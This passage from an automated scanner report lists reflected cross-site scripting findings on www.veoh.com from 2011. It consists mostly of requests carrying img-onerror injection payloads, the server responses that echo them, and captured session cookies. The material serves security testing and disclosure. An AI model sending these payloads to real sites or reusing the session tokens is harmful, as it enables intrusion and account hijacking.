trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'9445fc2cfdb27ccafffb6e6be9397f4d',
'v20767155HXCcYkcJb1c2d';713d1af7ffd'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.60. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b3fcf<img%20src%3da%20onerror%3dalert(1)>5a765c7587a was submitted in the REST URL parameter 4. This input was echoed as b3fcf<img src=a onerror=alert(1)>5a765c7587a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/entertainmentb3fcf<img%20src%3da%20onerror%3dalert(1)>5a765c7587a/watch/v20767324YkGXZzfQ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:50 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=100
Content-Length: 76165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_entertainmentb3fcf<img src=a onerror=alert(1)>5a765c7587a"}</textarea>
...[SNIP]...

1.61. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4e10"><img%20src%3da%20onerror%3dalert(1)>e01df9f8906 was submitted in the REST URL parameter 4. This input was echoed as b4e10"><img src=a onerror=alert(1)>e01df9f8906 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/entertainmentb4e10"><img%20src%3da%20onerror%3dalert(1)>e01df9f8906/watch/v20767324YkGXZzfQ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:35 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=75
Content-Length: 76209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/entertainmentb4e10"><img src=a onerror=alert(1)>e01df9f8906/sort/most viewed" selected="selected">
...[SNIP]...

1.62. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48a9e'%3b18c90b1747d was submitted in the REST URL parameter 6. This input was echoed as 48a9e';18c90b1747d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ48a9e'%3b18c90b1747d HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:39:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=50
Content-Length: 95042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'c8bbb1855300e40d30ea4034b2810d38',
'v20767324YkGXZzfQ48a9e';18c90b1747d'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.63. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 36ade<img%20src%3da%20onerror%3dalert(1)>19ea89e01e1 was submitted in the REST URL parameter 4. This input was echoed as 36ade<img src=a onerror=alert(1)>19ea89e01e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/people_and_blogs36ade<img%20src%3da%20onerror%3dalert(1)>19ea89e01e1/watch/v20767178Fn5bZQJP HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:50 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 77514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_people_and_blogs36ade<img src=a onerror=alert(1)>19ea89e01e1"}</textarea>
...[SNIP]...

1.64. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b8b"><img%20src%3da%20onerror%3dalert(1)>fa9b9160bac was submitted in the REST URL parameter 4. This input was echoed as b9b8b"><img src=a onerror=alert(1)>fa9b9160bac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/people_and_blogsb9b8b"><img%20src%3da%20onerror%3dalert(1)>fa9b9160bac/watch/v20767178Fn5bZQJP HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:28 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=60
Content-Length: 77558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/people_and_blogsb9b8b"><img src=a onerror=alert(1)>fa9b9160bac/sort/most viewed" selected="selected">
...[SNIP]...

1.65. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 614f9'%3be5e8b5ac5dc was submitted in the REST URL parameter 6. This input was echoed as 614f9';e5e8b5ac5dc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP614f9'%3be5e8b5ac5dc HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:39:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=58
Content-Length: 106431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'2890af68ed5816417589a98da58f349b',
'v20767178Fn5bZQJP614f9';e5e8b5ac5dc'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.66. http://www.veoh.com/category/list/tab/groups [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/groups

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba32a"><img%20src%3da%20onerror%3dalert(1)>a3be2b20567 was submitted in the REST URL parameter 4. This input was echoed as ba32a"><img src=a onerror=alert(1)>a3be2b20567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/groupsba32a"><img%20src%3da%20onerror%3dalert(1)>a3be2b20567 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4472
Date: Thu, 03 Feb 2011 21:47:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=51

<div class="categories categories-9" id="categories-groupsba32a"><img src=a onerror=alert(1)>a3be2b20567">
<ul><li class="column1"><a href="/browse/groupsba32a%22%3E%3Cimg+src%3Da+onerror%3Dalert
...[SNIP]...

1.67. http://www.veoh.com/category/list/tab/home [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/home

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 254d4"><img%20src%3da%20onerror%3dalert(1)>329c969f72e was submitted in the REST URL parameter 4. This input was echoed as 254d4"><img src=a onerror=alert(1)>329c969f72e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/home254d4"><img%20src%3da%20onerror%3dalert(1)>329c969f72e HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4420
Date: Thu, 03 Feb 2011 21:46:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91

<div class="categories categories-9" id="categories-home254d4"><img src=a onerror=alert(1)>329c969f72e">
<ul><li class="column1"><a href="/browse/home254d4%22%3E%3Cimg+src%3Da+onerror%3Dalert%281
...[SNIP]...

1.68. http://www.veoh.com/category/list/tab/movies [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/movies

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3604"><img%20src%3da%20onerror%3dalert(1)>53d97fb589d was submitted in the REST URL parameter 4. This input was echoed as d3604"><img src=a onerror=alert(1)>53d97fb589d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/moviesd3604"><img%20src%3da%20onerror%3dalert(1)>53d97fb589d HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4472
Date: Thu, 03 Feb 2011 21:46:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=34

<div class="categories categories-9" id="categories-moviesd3604"><img src=a onerror=alert(1)>53d97fb589d">
<ul><li class="column1"><a href="/browse/moviesd3604%22%3E%3Cimg+src%3Da+onerror%3Dalert
...[SNIP]...

1.69. http://www.veoh.com/category/list/tab/music [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/music

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32244"><img%20src%3da%20onerror%3dalert(1)>f5bcaf4b0ea was submitted in the REST URL parameter 4. This input was echoed as 32244"><img src=a onerror=alert(1)>f5bcaf4b0ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/music32244"><img%20src%3da%20onerror%3dalert(1)>f5bcaf4b0ea HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4446
Date: Thu, 03 Feb 2011 21:46:52 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=99

<div class="categories categories-9" id="categories-music32244"><img src=a onerror=alert(1)>f5bcaf4b0ea">
<ul><li class="column1"><a href="/browse/music32244%22%3E%3Cimg+src%3Da+onerror%3Dalert%2
...[SNIP]...

1.70. http://www.veoh.com/category/list/tab/tvshows [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/tvshows

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21de1"><img%20src%3da%20onerror%3dalert(1)>a2d080657a4 was submitted in the REST URL parameter 4. This input was echoed as 21de1"><img src=a onerror=alert(1)>a2d080657a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/tvshows21de1"><img%20src%3da%20onerror%3dalert(1)>a2d080657a4 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4498
Date: Thu, 03 Feb 2011 21:46:41 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=49

<div class="categories categories-9" id="categories-tvshows21de1"><img src=a onerror=alert(1)>a2d080657a4">
<ul><li class="column1"><a href="/browse/tvshows21de1%22%3E%3Cimg+src%3Da+onerror%3Dale
...[SNIP]...

1.71. http://www.veoh.com/category/list/tab/videos [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/videos

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97565"><img%20src%3da%20onerror%3dalert(1)>386056b84fa was submitted in the REST URL parameter 4. This input was echoed as 97565"><img src=a onerror=alert(1)>386056b84fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/videos97565"><img%20src%3da%20onerror%3dalert(1)>386056b84fa HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
